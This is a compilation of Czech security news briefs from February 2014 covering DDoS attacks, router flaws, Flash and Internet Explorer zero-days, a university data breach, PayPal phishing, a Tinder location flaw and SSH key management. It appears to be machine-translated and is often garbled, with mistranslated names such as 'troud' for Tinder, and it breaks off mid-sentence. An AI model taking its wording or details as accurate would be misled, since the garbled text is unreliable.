Qualys předseda představenstva a generální ředitel Philippe Courtot bude přednese projev na nadcházející konferenci RSA 2014 na čtvrtek 27 únor v 15:30 PT. Bezpečnostní odborníci v obecné nedůvěry cloudu, jsou obavy ze ztráty kontroly, fly-by-noční třetí Řešení stran, soukromí a sledování. Nicméně, cloud poskytuje způsob, jak řešit problémy, jako je zmizelého obvodu, všudypřítomných připojených zařízení a nových kategorií útoku. Tento keynote se bude diskutovat o tom, jak se můžeme posunout dynamický a použít cloud bránit proti zvýšení bezpečnostních výzev, před nimiž stojíme. Kromě klíčového zasedání, vedení a výzkumníci společnosti nabídne pohled na aktuální hrozby a trendy v odvětví souvisejících s bezpečností prohlížeče, zranitelnosti v rámci populárních embedded zařízení, a to, jak nejlépe řídit efektivní bezpečnostní programy napříč vládními agenturami a podniky. průběžného monitorování se 20 kritických bezpečnostních kontrol (SPO1-W02) Středy 26.února v 09:20 PT, Pokoj pro 131 V 20 Kritické Bezpečnostní kontroly (CSC) nastínit praktický přístup k provádění bezpečnostních technologií tím, že poskytuje osvědčené pokyny pro ochranu IT prostředí. Kontinuální monitoring hraje důležitou roli při provádění 20 CSC, a dobrou zprávou je, že tam jsou nové nástroje, které vám mohou pomoci automatizovat přijetí 20. CSC. Tato relace Wolfgang Kandek, CTO, Qualys, budou podrobně, jak používat tyto nástroje, ochranu firemních prostředí a aby se vaše data v bezpečí. Is Your Browser User Agent, nebo Double Agent (DSP-R04A) Úterý 27 únorem v 12:00 PT, Pokoj 2006 by Privacy nesmí být dodatečně v prohlížeči. Bezpečnost dat ve webových a mobilních aplikací se opírá o technických kontrol, jako je politika stejného původu a tzv. sandboxu. Jak prohlížečů přidat složitější funkce, musí průmysl zvážit kompromis mezi zlepšením API pro vývojáře a omezují schopnost útočníků zneužívat těchto rozhraní API. Tato prezentace Mike Semy, ředitel inženýrství, Qualys, se bude týkat ohrožení ochrany osobních údajů, které mohou aplikace setkávají prostřednictvím prohlížeče.
NameCheap DNS hit server s "novým typem" DDoS
28.2.2014 Počítačový útok
Populární registrátor domén a webhostingové služby si Vaši byl potíže s nečekaným DDoS útoku zaměřeného na 300 nebo tak domén na dvou svých svých DNS nameservery.
"Samotná velikost útoku zahlceni mnoha našich DNS serverů za následek nedostupnost a pomalý výkon. Naše původní odhady ukazují, že velikost útok na více než 100Gbps, dělat to jeden z největších útoků někdo viděl, nebo se týkají. A to je Nový typ útoku, který jsme my a naše hardwarové a síťové partneři dosud nesetkal, "si Vaši generální ředitel Richard Kirkendall a Vice President Matt Russell sdílené v příspěvku . útok začal kolem 15,55 GMT / 11.55 EST ve čtvrtek, a byl plně zmírnit o tři hodiny později, ale to trvalo nějakou dobu pro všechny DNS služby společnosti vrátit zpět do normálu. "Náš DNS platforma je nadbytečný, globální platforma se šíří přes 3 kontinentech a 5 zemí, které zpracovává DNS pro mnoho našich zákazníků. To je platforma pečlivě udržovány a běžel, a platforma, která úspěšně odrazí další DDoS útoky na téměř denně, "vysvětlil dva, ale dodal, že se stále snažil udržet své služby k dispozici zákazníkům. "Trvalo nám asi 3 hodin, aby plně zmírnění útoku, úzce spolupracuje s naším hardware a sítě dodavatelů, "oni dále sdílet, a oznamuje zlepšení, aby k podobným útokům v budoucnu:" Jsme předkládání klíčovou infrastrukturu programu vylepšení DNS, který bude vidět nás masivně rozšířit Velikost naší infrastruktury DNS a naši schopnost absorbovat a odrazit útoky, jako jsou tyto. " Velikost útoku není největší, kdo někdy viděl, jako 300 gigabitů za sekundu (ve špičce) DDoS byla zaměřena proti SpamHaus v loňském roce, a teprve nedávno Cloudflare odhalil jejich infrastruktura, které byly podrobeny jednomu dosažení 400 gigabitů za sekundu. Nicméně, DDoS útoky jsou stále vážnou obtíž, zejména proto, že útočníci začali využívat zranitelné servery NTP namontovat masivní reflexe útoků. To je ještě známo, zda servery NameCheap je byly hit s tímto konkrétním typu DDoS - ". nový typ útoku" Kirkendall a Russell jen řekl, že je Vzhledem k tomu, že NTP reflexe útoky nejsou tak nové a neznámé, Zajímalo by mě, jestli byli svědky další, dosud (do značné míry), neznámý a nepoužívaný typ útoku.
Bezpečnostní chyby nalezené v 80% nejprodávanější SOHO bezdrátových směrovačů
28.2.2014 Zranitelnosti
Tripwire analyzoval bezpečnost poskytované z nejoblíbenějších bezdrátových směrovačů používány v mnoha malých a domácích kanceláří a zjistil, že 80 procent z top 25 nejprodávanějších SOHO bezdrátových modelů routerů Amazon se chyby zabezpečení.
Z těchto ohrožených modelů, 34 procent veřejně zdokumentováno exploity, které dělají to relativně jednoduché pro útočníky k řemeslu buď vysoce cílené útoky nebo obecné útoky na každý zranitelný systém, které můžete najít. Směrovače jsou ideálním cílem pro cyberattackers, protože mohou být použity k odposlouchávat provoz poslal do a ze sousedních přístupových firmě bodů. Poté, co útočník získal kontrolu nad routeru, jsou schopni sledovat, přesměrovat, zablokovat nebo jinak manipulovat s celou řadou on-line aktivit. Jakmile router je ohrožena, zařízení hlídané routeru firewall stát cílů pro další útoky ze sítě. Dokonce i technicky orientované uživatele je obtížné určit bezdrátový router kybernetického útoku, protože router uživatelská rozhraní jsou minimální, a provoz poslal z ohrožení zařízení . cyberattackers je obvykle neviditelné nálezy Klíčové studie patří:
30 procent IT profesionálů a 46 procent zaměstnanců se nezmění výchozí heslo správce na svých bezdrátových směrovačů. S přístupem do konfiguračního rozhraní, útočníci mohou snadno ohrozit zařízení.
55 procent IT profesionálů a 85 procent zaměstnanců se nezmění výchozí adresu IP (Internet Protocol) na svých bezdrátových routerů, což Žádost o Cross-Site padělání (CSRF) útočí mnohem jednodušší pro cyberattackers.
43 procent IT profesionálů a 54 procent zaměstnanců pomocí Wi-Fi Protected Setup (WPS) - nejistý standardní, že je to jednoduché pro útočníci objevit routeru šifrování frázi, bez ohledu na jeho složitost a sílu.
52 procent IT profesionálů a 59 procent zaměstnanců neaktualizovali firmware na svých routerech na nejnovější verzi, takže i když bezpečnostní aktualizace od routeru dodavatelů jsou k dispozici, většina uživatelů neobdržíte dodatečnou ochranu.
Několik klíčových bezpečnostních postupů může pomoci uživatelům může účinně omezit Bezdrátový router kybernetickým útokům. Nicméně, studie Tripwire v bezdrátových bezpečnostních router postupů mezi IT profesionály a zaměstnanců, kteří přístup k podnikovým sítím ze vzdálených míst ukazuje, že tyto praktiky nejsou široce používány. "Vert v oblasti výzkumu a SANS nedávný objev The Moon červa v současné době infikování vystavené Linksys routery znamená, že ohrožení směrovače bude i nadále zvyšovat, jak škodlivé herci poznat, kolik informací lze získat tím, že napadne těchto zařízení, "řekl Craig Young, bezpečnostní výzkumník Tripwire. "Bohužel, uživatelé nemají změnit hesla výchozí správce nebo výchozí IP adresy v těchto zařízeních a Toto chování, spolu s převahou ověřování bypass zranitelnosti, otevírá dveře pro rozsáhlé útoky prostřednictvím škodlivých webových stránek, pluginy a smartphone aplikace, "dodal Young.
Růst a složitost mobilních hrozeb
28.2.2014 Mobil
Jako zaměstnanci nadále používat svá vlastní zařízení a osobní aplikace pro pracovní účely, další hrozby jsou zavedeny na pracovišti, čímž firemních sítí v ohrožení. Zpráva Webroot také poskytuje návrhy a osvědčených postupů, aby se snížilo riziko k firemním datům z mobilních zařízení zaměstnanců vlastnictví.
Klíčová zjištění patří:
Zvýšení celkových ohrožení Android zařízeními v 2013 384%.
42% Aplikace pro Android analyzovaných byly klasifikovány jako nebezpečné, nežádoucí nebo podezřelé.
Riziko infekce srovnání mezi platformami Android a iOS.
29,3% ze všech sledovaných infekcí SMS pramení z herních aplikací.
Nová zpráva, na základě údajů shromážděných podle Webroot Threat Research týmu, analyzovat více než 5,9 milionu mobilních aplikací (apps), 31000 infekce, téměř 125.000 Lost Protection Device aktivace a infekce ceny z milionů zákazníků. Zvýšené riziko je způsobeno tím, Škodlivé aplikace, včetně těch, které vyžadují zakořenění zařízení, posílat prémiové SMS zprávy, a shromažďovat všechny dostupné údaje. Zpráva zdůrazňuje, že je důležité, stahování aplikací z důvěryhodných zdrojů, jako je Google Play a iTunes. Mnoho app trhy třetích stran, se nevztahují přísné bezpečnostní normy a mohou nevědomky hostit škodlivé soubory. "Spotřebitelé jsou velmi důvěřiví mobilních aplikací, jako je Facebook, Twitter a Angry Birds -. jsou aplikace, které znají a používají nějakou dobu se však, že je to tisíce neověřených aplikací, často se nacházejí na trzích třetích stran nebo P2P sítí, které kladou uživatelům v ohrožení, "řekl Grayson Milbourne, bezpečnostní inteligence ředitel Webroot. "Zpráva ukazuje, že tato linie myšlení je nebezpečné, špatné volby app může vést k ohrožení celé podnikové sítě. bude potřeba zabezpečit mobilní zařízení i nadále růst jako objevení nových exploitů a škodlivých aplikací zvýšit, vše poháněno jasným zaměřením na mobilní platformy počítačové trestné činnosti v rámci komunity, "dodal Milbourne. proliferace mobilních zařízení, zejména osobních zařízení používaných v pracovním prostředí, známý jako "přinést svém zařízení" nebo BYOD-lze vystavit podnikové sítě k vyšším rizikem a pokračující růst platformy pro Android je zvláštního zájmu. Data ukázala téměř nárůst 4X objemu potenciálně ohrožuje aplikace pro Android v roce 2013, zatímco nedávná zpráva od Strategy Analytics uvedeno Android napájen 79 procent všech chytrých telefonů prodaných ve stejném období. A zároveň umožňuje tato zařízení pro přístup k produktivitu pomůcky firemní zdroje, zvýšený potenciál pro kompromis otevírá rizik vektor, pro který musí být pracovníci IT vzít v úvahu. Úplná zpráva je k dispozici zde.
Adobe opravuje Flash 0-day
28.2.2014 Zranitelnosti
Adobe vydala své druhé out-of-band aktualizace pro Adobe Flash tento měsíc. APSB14-07 řeší tři zranitelnosti v Adobe Flash, včetně chyby CVE-2014 do 0502, které se používají ve volné přírodě k útoku uživatelů se zlými úmysly prostřednictvím webové stránky. The 0-day chyba v přehrávači Flash CVE-2014-0502 byla objevena asi před týdnem by FireEye , které uvádí, že byl nalezen na třech webových stránkách, které jsou provozovány neziskovými institucemi. Naštěstí organizace, které jsou spuštěny nejnovější operační systémy a aplikační kód nejsou ovlivněny útoku. Chybí jim zranitelné komponenty, které umožňují útok přijít k úspěšnému závěru. Zejména útok potřebuje, aby se vyhnula ASLR, aby byla úspěšná, a proto se zaměřuje pouze na určité konfigurace:
Windows XP (což nemá ASLR)
Windows 7 s nainstalovanou Javu 1.6, který umožňuje pro ALSR bypass, ale Java 1.6 je EOL již a obecně náchylnější k jiným využije
Windows 7 s plně aktualizovanou verzi sady Office 2007 nebo Office 2010, také citlivé na jiné využije.
Naše doporučení je aktualizovat tak rychle, jak je to možné. Organizace, které provozují některé z výše uvedených organizací, je třeba to udělat tak rychle, jak je to možné, jiní mohou vrátit tuto opravu na normální plánu, ale je třeba si uvědomit, že útočníci mohou změnit své taktiky kdykoli zneužít další softwarové balíčky, které také únik paměťových míst. Společnost Microsoft aktualizuje poradní KB2755801 , která centralizuje aktualizace Flash v aplikaci Internet Explorer 10 a 11.. Uživatelé IE10 nebo IE11, stejně jako Google Chrome nemusíte aktualizovat Adobe Flash odděleně, ale místo toho je řešen prostřednictvím svých prohlížečů automaticky. Autor: Wolfgang Kandek, CTO, Qualys.
Přes nákladů, organizace přehlédnout nové hrozby
28.2.2014 Mobil
Nová generace neznámých bezpečnostních hrozeb vyplývajících z megatrendů a technologií, jako je BYOD, mobilita, cloud computing a používání internetu, stejně jako vnitřních akcí havarijního i škodlivý, představí organizace na mnoha nových rizik.
Podle globálního průzkumu zabezpečení společnosti Dell, nicméně, většina vedoucích IT po celém světě říkají, že nemají-li zobrazit tyto hrozby jako top obavy o bezpečnost a nejsou priorit, jak najít a řešit je v rámci mnoha míst původu. Ve skutečnosti, když byli respondenti požádáni, aby se na dlouhodobé priority, pouze 37 procent zařadil neznámé hrozby jako nejvyšší bezpečnostní obavy v příštích pěti letech. epidemie hrozby pocházejí ze všech obvodů, a to jak uvnitř, tak vně organizace, a jsou často skryté ve špatně nakonfigurovaná nastavení nebo oprávnění, a neúčinná správa dat, řízení přístupu a použití politiky. Globální průzkum bezpečnosti Dell předních bezpečnostních rozhodovací pravomocí veřejného a soukromého sektoru měřit jejich povědomí a připravenosti na této nové vlny hrozeb trápí bezpečnosti IT. Některá klíčová zjištění patří:
64 procent respondentů souhlasí s tím, že organizace bude muset restrukturalizovat / reorganizovat své IT procesy, a být více spolupráce s ostatními odděleními, aby zůstali před další bezpečnostní hrozby. Dotázaných ve Spojených státech, 85 procent uvedlo, je třeba tento přístup, kontrastující s Velkou Británií (43 procent) a Kanadě (45 procent), které byly alespoň přesvědčena, že by bylo nutné.
Téměř 90 procent respondentů věří, že vláda by měla být zapojena do určování kybernetické obranné strategie organizací ", a 78 procent ve Spojených státech se, že federální vláda hraje pozitivní roli při ochraně organizace před interními i externími hrozbami, které zdůrazňuje potřebu silného vedení a poradenství od organizací veřejného sektoru v pomoci zajistit soukromý sektor.
Dramatický nárůst počtu sociálního inženýrství, škodlivých a / nebo náhodné vnitřních útoků, stejně jako sofistikované, pokročilé přetrvávající hrozby znamená, že organizace je zranitelná ze všech směrů. Všechny zúčastněné strany musí okamžitě přijmout opatření pro posílení přístupu k body uvnitř i vně obvodu, a pomáhá uživatelům předcházet takovým útokům.
67 procent respondentů tvrdí, že se zvýšily finanční prostředky vynaložené na vzdělávání a školení zaměstnanců v uplynulých 12 měsících, 50 procent věří, že bezpečnostní školení pro nové i současných zaměstnanců je prioritou
54 procent se zvýšily výdaje na monitorování služeb v průběhu minulého roku, toto číslo vzroste na 72 procent ve Spojených státech.
Mezi rozhodovací pravomocí v oblasti IT dotázaných, BYOD, cloud a Internet byly hlavních oblastí zájmu bezpečnostních hrozeb. BYOD - značný počet respondentů zdůraznil mobility jako příčina porušení, se zvýšenou mobilitou a uživatelské volby záplavy sítí s přístupová zařízení, které poskytují mnoho cest k odhalení data a aplikace k riziku.
93 procent dotazovaných organizací, aby osobní zařízení pro práci. 31 procent koncových uživatelů přístup k síti na osobní zařízení (37 procent ve Spojených státech)
44 procent respondentů uvedlo, že se zavádějí politiky pro BYOD bezpečnost je velmi důležité v prevenci narušení bezpečnosti
57 procent zařadil zvýšené využívání mobilních zařízení, jako nejvyšší bezpečnostní obavy v příštích pěti letech (71 procent ve Velké Británii)
24 procent uvedlo, zneužití mobilních zařízení / operační systém zranitelností je příčinou narušení bezpečnosti.
Cloud - Mnoho organizací dnes používají cloud computing, případně zavedení neznámé bezpečnostní hrozby, které vedou k cíleným útokům na organizačních dat a aplikací. Výsledky průzkumu dokazují tyto Stealthy hrozby přicházejí s vysokým rizikem.
73 procent dotázaných hlásí jejich organizace v současné době používají mrak (90 procent ve Spojených státech)
Téměř polovina (49 procent) zařadil zvýšené využívání cloudu jako nejvyšší bezpečnostní obavy v příštích pěti letech, což naznačuje, neklid pro budoucnost, protože pouze 22 procent uvedlo, přesunu dat do cloudu byl nejvyšší bezpečnostní problém dnes
V organizacích, kde bezpečnost je hlavní prioritou pro příští rok, 86 procent jsou pomocí cloud
21 procent uvedlo, cloud aplikace nebo využití služby jsou příčinou jejich porušení bezpečnosti.
Internet - význam neznámých hrozeb, které vyplývají z těžké použití internetové komunikace a distribuovaných sítí svědčí i 63 procent respondentů, kteří zařadil větší spolehnutí na internetu a aplikací založených na prohlížeči jako top znepokojení v příštích pěti letech.
Více než pětina respondentů považuje infekci z nedůvěryhodného vzdáleného přístupu (veřejné Wi-Fi), mezi prvními třemi se týká zabezpečení pro jejich organizaci
47 procent identifikovat malware, viry a útoky často k dispozici prostřednictvím webových aplikací, OS záplatování otázky, a dalších faktorů zranitelnosti aplikací souvisejících jako příčiny porušování
70 procent se v současné době používá zabezpečení e-mailu, aby se zabránilo outsider útoky k síti přes jejich e-mailové kanálu.
Průzkum ukázal, že 76 procent z IT vůdci dotazovaných (93 procent ve Spojených státech), se shodují, že v boji proti dnešním hrozbám, organizace musí chránit sám sebe a to jak uvnitř, tak vně jejích obvodů. To vyžaduje nejen komplexní sadu řešení, která chrání zevnitř ven a zvenku v - z koncového bodu, do datového centra do cloudu ─, ale ten, který také spojuje tyto schopnosti poskytnout hlubší vhled a silnější Predictive Analytics, aby strategické opatření mohou být přijata rychle.
Mobilní hrozby po celém světě
28.2.2014 Mobil
2013 byl rokem změn ve světě mobilních hrozeb. Kampaně se stále více terčem zločinců přizpůsobily své postupy s cílem maximalizovat zisk a působí pod radarem. V místech, kde regulace je těžké, zločinci klesl více tradiční zpeněžení strategie, jako je podvod premium rate SMS a spekulativních "šedé zóně", taktiky, které jsou vlastně legální.
Mobilní hrozby encounter ceny po celém světě:
USA - 30,38%
UK - 37.72%
Čína - 48,2%
Rusko - 75,42%
Po letech iterace a postupně mění kód a taktiky, v 2013 vzorcích bylo jasné, v mobilních hrozeb průmyslu. Nuceny soutěžit při práci se vyhnout detekci policie nebo bezpečnostních firem -. Mobilní zločinci se začala specializovat povolena šířit nekontrolovaně, adware dosáhl vrcholu v roce 2013, se šíří do všech koutů světa. Jste pětkrát větší pravděpodobnost, že narazíte na adware, než jste malware. V září, Google aktualizoval Play Store podmínky, odstranění asi 36.000 aplikací, které obsahují reklamní sítě, které porušil pravidla. Dopad byl okamžitý. Ve 3. čtvrtletí roku 2013 adware sazby začaly klesat. Snímek Encounter Ceny pro mobilní hrozby v USA
25% lidí se setkal adware na svém telefonu - hlavní hrozbou pro uživatele v USA
5,3% lidí se setkal chargeware - druhý největší hrozbou pro uživatele v USA
Malware je stále relativně nízká u 4,22% - díky důvěryhodným app obchody a silnou regulační prostředí.
Oversharing
28.2.2014 Bezpečnost
o "podivnou UDP z celého", že on byl najednou viděl ve svém logu firewallu, jsme nejprve předpokládal, že jeho připojení k Internetu se "zdědil" dynamickou IP adresu, která předtím byla používaný bující souboru sdílení uživatele, a že Michael byl nyní vidět "po záři".
Stále požádal o PCAP (tcpdump) podat i když, a když jsme se podívali na to, co Michael poslán zpět, viděli jsme k našemu překvapení ...
... Že síť Michaelova reagoval na provoz. Hmm. Jejda!
Bližší dotaz pak ukázalo, že nedávno aktualizoval firmware na jejich QNAP TS-659 NAS (síťové úložiště) serveru .. a tato nová verze přišla s možností působit jako média a streamovací server. Není zcela jasné, zda odpovídající funkce byla "o" ve výchozím nastavení, nebo byl zapnut náhodou. Ale jakmile se vypne, "zvláštní UDP" zastavil hned.
Poučení - po upgradu, zkontrolujte, zda jsou věci stále, jak můžete očekávat, že budou. Zatímco většina výrobců se naštěstí naučili, aby se nové "funkce" ve výchozím nastavení vypnuta, nelze zcela spoléhat na to. Pro domácí použití, investovat do malé sítě kohoutku nebo rozbočovači, a tu a tam zkontrolovat provoz opustit svůj dům, je (a) dobrou bezpečnostní opatření, a (b) pomáhá udržovat aktuální své dovednosti Wireshark Packet-Fu :)
A když už jsme u tématu NAS a úložných serverů: CERT zranitelnost poznámka dnes vydala se uvádí, že některé verze Synology DiskStation může obsahovat pevný kódované heslo, které mohou být použity vzdálenému útočníkovi vytvořit VPN do stanice DiskStation. Přál bych si, prodejci - výrazně včetně Cisco - by se jejich pípání dohromady, a po letech "bezpečnostní zprávy" na toto téma, nakonec přestat dodávat výrobky s tvrdými kódovaných pověřovací / zadní vrátka! Podrobnosti o Synology nepořádek zde: http://www.kb.cert.org/vuls/id/534284
Téměř 310,000 ovlivněn University of Maryland porušení
28.2.2014 Incidenty
University of Maryland je nejnovější instituce vyššího vzdělávání, aby trpěli porušení dat značného rozsahu a rozměrů, jak byly zkopírovány a exfiltrated ze svých sítí téměř 310.000 záznamů pracovníků a studentů. "zvláštní databázi záznamů vedených podle našeho IT oddělení bylo porušil včera. Tato databáze obsahovala 309.079 záznamy fakulty, zaměstnanců, studentů a přidružených pracovníků z College Park a Shady Grove areálech, které byly vydány v univerzitní ID od roku 1998, "Wallace D. Loh, univerzitní prezident vysvětlil v prohlášení zveřejněném . na internetových stránkách ve středu "se záznamy zahrnuté jméno, rodné číslo, datum narození, a Univerzitní identifikační číslo Žádné jiné informace byly ohroženy -. žádný finanční, akademické, zdraví, nebo kontakt (telefon, adresa) informace." Podle Diamondback , porušení došlo v úterý mezi 4 a 5 hodin, a byla zjištěna mezi 8 a 9 hodin téhož dne. Brian Voss, univerzitní viceprezident informačních technologií, sdílené, že útočníci se neobtěžoval s pozměňování dat sítě univerzity. Také, že zřejmě byly velmi schopný. "pracoval někdo kolem velmi přísné bezpečnostní a získal přístup k těmto údajům. Ten, kdo se to zlomil přes několik úrovní zabezpečení, aby bylo možné získat tento soubor, "řekl Voss, a poukázal na to, že porušení nebylo úspěšné, protože někdo nechal otevřené dveře, nebo udělal chybu. "Univerzity jsou zaměření na dnešních globálních útoků na IT systémy. Nedávno jsme zdvojnásobili počet našich bezpečnostních techniků IT a analytiků. Jsme také zdvojnásobila své investice do nástrojů zabezpečení top-end. Je zřejmé, že je třeba udělat více a lépe, a my, "komentoval Loh. "Počítačová forenzní vyšetřovatelé zkoumají porušené soubory a protokoly s cílem určit, jak byly naše sofistikované, multi-vrstvené bezpečnostní obrany obešel." prosazování práva byla rovněž zahrnuta v šetření. Univerzita má v úmyslu nabídnout jeden rok zdarma úvěrového monitoringu všech dotčených osob, a varoval je, aby pozor na phishing e-maily a telefonáty, které by mohly vydávat se na univerzitu, a požádat je, aby sdílet osobní a finanční informace.
Prvotřídní phishingové e-mailové tvrzení "Váš Paypal transakce byla odmítnuta"
28.2.2014 Phishing
Velmi dobře vyrobené falešné oznámení odvolávají PayPal transakce příjemců byla odmítnuta dělají kola a snaží se přimět uživatele sdílení osobních a finančních informací. email - dobře formátovaný a sportovní logo PayPal - vysvětluje, že "neobvyklou aktivitu" z "podezřelé lokality "byl spatřen v úvahu příjemců, což je přesvědčen, že" někdo se pomocí svého PayPal účtu bez vašeho vědomí. " To pak pokračuje říkat, že nejlepší způsob, jak vyřešit tento problém a vyhnout se opět děje, je ke stažení v příloze dokument, otevřete ji v prohlížeči, a postupujte podle pokynů. Ti, kteří dodržování těchto pokynů budou přijata na prostřednictvím řetězce zfalšovaných stránkách PayPal.
První je přihlašovací stránka, pak okno pro zadání příjemce zadejte osobní údaje (jméno, rodné příjmení matky, datum narození, adresa), následuje stránky vyžadující bankovní účet a informace o kreditních kartách, a konečně stránka "potvrzení" . Konečně, oběť je přesměrován na skutečné stránkách PayPal. "Falešné formy i provádět základní kontrolu chyb, aby zajistila, že oběti mají vstup správné typy dat," Hoax-Slayer bere na vědomí , poukazuje na to, že tento druh sofistikovaných pokusů o phishing mohl i trik další počítačové gramotnosti uživatelů - "zvláště jsou-li obsazeno nebo unavený." Pokud jste někdy obdržíte e-mail, jako je tento, ignorovat ho, nebo ještě lépe, oznámit PayPal o tom. A pokud máte strach, váš účet byl ohrožena, ujistěte se, že záležitost prošetří tím, že půjdete na legitimní webové stránky PayPal (rozhodně ne po odkazu na něj) a přihlášení odtud.
Problémy Microsoft Fix it kritické IE 0-day využívány při útocích
28.2.2014 Zranitelnosti
Microsoft konečně vydala bezpečnostní poradenství zabývající IE zero-day, která byla v nedávné době aktivně využit v útocích ve volné přírodě , a následoval s Fix It nástroj dočasně zmírnit problém, dokud nebude vydána oprava. Tento zero-day je vzdálené spuštění kódu, která může poškození paměti a umožňuje útočníkovi spustit libovolný kód v kontextu aktuálního uživatele v aplikaci Internet Explorer. Tato chyba je snadno spouští, a vyžaduje, aby cíle jednoduše návštěvě speciálně vytvořené webové stránky hosting využívat, nebo webové stránky, které přijímají nebo hostující materiál poskytovaný uživateli obsah nebo reklamy, které bya mohly tuto chybu zabezpečení zneužít. Je to jen otázka láká uživatele na takovém místě. pouze Internet Explorer 9 a Internet Explorer 10 arů touto chybou zabezpečení ohroženy -. přestože puntíkovaný útoky soustředily na kompromisu pouze IE 10 uživatelů IE verze 6, 7, 8 a 11 nejsou dotčena a Microsoft radí uživatelům, aby se ochránili upgradem na nejnovější verzi zpřístupněna. Ti, kteří nemohou aktualizovat v tomto okamžiku, můžete si stáhnout konkrétní spravit nebo instalovat Enhanced Experience Toolkit pro zmírňování (Emet), jak využít zabraňuje sám z provozu, pokud zjistí, Emet na cílovém počítači. "Na dokončení tohoto šetření, bude společnost Microsoft proveďte příslušnou akci k ochraně našich zákazníků, které mohou zahrnovat poskytování řešení prostřednictvím naší měsíčně vydávané aktualizace zabezpečení, nebo out-of- cyklu aktualizací zabezpečení, v závislosti na potřebách zákazníka, "došli k závěru.
Major zranitelnost v troud datování app povoleno sledování uživatelů
28.2.2014 Zranitelnosti
Zahrnout Security představila nový výzkum ukazuje, že uživatelé populární online dating app troud byly významným rizikem kvůli zranitelnosti objevili v geo-umístění funkce aplikace. Tato chyba zabezpečení dovolil uživatelům troud sledovat každý další je přesné umístění pro hodně z roku 2013.
Vědci poprvé objevili chybu a nahlásil na troud loni na podzim, citovat, že chyba zabezpečení umožňuje každému uživateli Tinder najít místo jiného uživatele, pokud aplikace Tinder běží, nebo jejich poslední známé místo, pokud ne. Použití algoritmu s názvem trilaterace, výzkumných pracovníků byli schopni získat přesné zeměpisné šířky a délky koordinuje pro všechny uživatele troud. Každý, kdo s primitivní znalosti programování by mohlo dotaz troud API přímo a strhnout souřadnic každého uživatele. To vedlo k porušení ochrany osobních údajů pro uživatele aplikace. Erik Cabetas, managing partner a zakladatel Zahrnout řekl Security "Vzhledem k troud architektury, to není možné, aby jeden uživatel Tinder vědět, pokud jiný využil této zranitelnosti v průběhu Doba expozice. Následky zranitelnost tohoto typu byly všudypřítomné vzhledem troud masivní globální základnu uživatelů. Jakmile se náš výzkumný tým objevil, jsme informovali zranitelnost přímo na troud a navázala několikrát mezi říjnem a prosincem 2013 bylo zajištěno, že jsou řešení problému. " V určitém bodě v období mezi prosincem a začátkem ledna, Tinder dělal vydat opravu tohoto problému. "Jak více a více aplikací jsou postaveny obsahovat geo-lokalizační služby, je zde zvýšené riziko pro soukromí a bezpečnost Uživatelé, "dodal Cabetas. "Aplikační prodejci a vývojáři mají odpovědnost za zajištění soukromí svých uživatelů, a bezpečnosti je chráněna, zranitelnosti jsou sděleny okamžitě, a priorita je věnována rozvoji důležité opravy, jako je tento." Tady je video z zranitelnosti v akci:
96 procent z aplikací mají bezpečnostní chyby
28.2.2014 Bezpečnost | Zranitelnosti
Zlepšení záplat a bezpečných kódovacích postupů udělali mírný vliv na výskyt slabých míst, podle nové zprávy Cenzic.
Nicméně, vznik BYOD, cloudových služeb a mobilních aplikací - a pokračoval selhání organizací odhalit a řešit využije kolem úniku informací, autentizace a autorizace, a správu sezení se držet zranitelnosti téměř všudypřítomný. Ve skutečnosti, střední počet zranitelností na aplikace - 14 - je ve skutečnosti větší, než tomu bylo v předchozím roce - 13. Zpráva odhalila širokou škálu poznatků, pokud jde o aplikační zranitelnosti, včetně:
Trvalý nárůst výskytu bezpečnostní chyby v mobilních aplikacích. Zpráva zjistila, že porušení soukromí a nadměrné výsady se objeví ve více než 80 procent mobilních aplikací.
Zvyšující se výskyt zranitelnosti nalezené v aplikacích sdíleny s třetími stranami. Cloud poskytovatelé služeb a partnery v dodavatelském řetězci, které mohou být mimo sféru organizace vlivu jsou hlavním zdrojem hrozeb dnes.
Únik informací je způsobena zranitelných aplikací. Kolem 23 procent zranitelností byly v souvislosti s únikem informací, ve kterém aplikace nevhodně odhaluje citlivá data, jako jsou technické informace o aplikaci nebo data specifická pro uživatele.
Problém prastarý of Cross-Site Scripting (XSS) je stále na vině. Některé 25 procent zranitelností byly v souvislosti s cross-site scripting (XSS), ve kterém aplikace umožňuje útočníkům posílat škodlivé skripty předávání skript z jinak důvěryhodné adresy URL.
Smíšené zranitelná místa v jiných oblastech, nemůže být ignorována. Nedostatky v ověřování a autorizace tvoří 15 procent zranitelností, a chyby řízení relace tvořily 13 procent.
Mnoho z dnešních slabých míst - dokonce i ty, které jsou relativně nové - lze předcházet. Cenzic nastínil některé klíčové osvědčené postupy připomínat podniky některých jednoduchých řešení, která mohou pomoci zabezpečit jejich aplikace: . realizovat bezpečné postupy psaní kódu Jedná se o techniky používané vývojáři aplikací odvrátit potenciální narušení bezpečnosti. Konzistentní, kvalitní kódovací postupy jsou nejúčinnější odrazující prostředek vůči útokům. Použití firewallů pro webové aplikace (Wafs). Wafs umožňuje blokování na základě zásad konkrétních zranitelností, které existují v aplikacích, bez přepisování kódu aplikace. Wafs jsou zvláště efektivní metoda pro rychlé zablokování chybu našel v aplikaci produkce, aniž by bylo nutné plně re-vydání žádosti obsahující zranitelnosti. zajistit správné konfigurace serveru. To je řada postupů pro správu serveru hardwaru, operačních systémů a Osvědčení o bezpečnosti na zařízení se systémem konkrétní aplikaci.
60% podniků opírajících se o administrátoři self-policejní SSH klíčů
28.2.2014 Šifrování
Podniky tolerovat chyby zabezpečení tím, že otevřené dveře, přístup na úrovni kořenového adresáře, podle nové zprávy Ponemon Institute. 46% z 1854 respondentů jejich servery a sítě jsou ponechány otevřené a mohou být vlastněny navždy útočníky, protože se jim nepodaří otočit SSH klíče. Není divu, že 51% organizací uvedlo již porušena útokem pomocí SSH. Tento otvor v podnikové bezpečnosti neprošla bez povšimnutí. Nedávno odhalil provoz Maska krade SSH klíče vydávat, sle, sbírat, a dešifrovat komunikaci svých cílů "a data. Pokud SSH klíče jsou nahrazeny po průniky, jako masky útoky, podnikové sítě zůstávají ve vlastnictví útočníků. Výzkum Ponemon také zjistil, že 60% organizací se nepodařilo odhalit nepoctivé SSH klíče na svých sítích, protože správcům systému self-policejní SSH klíče pomocí manuální procesy. "Často se podíváme na širokou škálu různých bezpečnostních IT problémy, které mají dopad globální organizace. Tato studie vyniká jak to ukazuje poškození, které jeden, nechráněný SSH klíč může způsobit, "řekl Dr. Larry Ponemon, předseda a zakladatel Ponemon Institute. "Ačkoli SSH klíče zabezpečení IT technologií, které jsou často neřešení v rukou široké škály správce, které nejsou v teorii nebo praxi, odborníků v oblasti bezpečnosti IT. Toto malé špinavé tajemství, odhalila průzkumu, je dalším důkazem, že kořen přístup k světově nejvíce 